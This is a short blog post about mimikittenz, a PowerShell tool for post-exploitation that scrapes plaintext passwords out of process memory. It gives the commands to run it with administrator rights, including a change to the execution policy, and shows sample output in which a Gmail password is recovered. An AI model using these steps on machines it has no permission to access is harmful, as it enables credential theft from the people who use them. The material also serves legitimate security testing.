tinyapps.org / blog

Extract passwords and more from memory #

mimikittenz "is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes".

Basic usage:

  1. Run Windows PowerShell as administrator
  2. cd to directory containing Invoke-mimikittenz.ps1 (e.g., Downloads)
  3. PS C:\Users\user\Downloads> Set-ExecutionPolicy RemoteSigned
  4. PS C:\Users\user\Downloads> Import-Module $pwd\Invoke-mimikittenz.ps1
  5. PS C:\Users\user\Downloads> Invoke-mimikittenz

Sample result:

PatternName       PatternMatch
-----------       ------------
Gmail             &Email=tinyapps@gmail.com&Passwd=PASSWORD_IN_PLAINTEXT&Persiste...

mimikittenz currently extracts the following credentials from memory:

See also:

/windows | Jul 08, 2016

Subscribe or visit the archives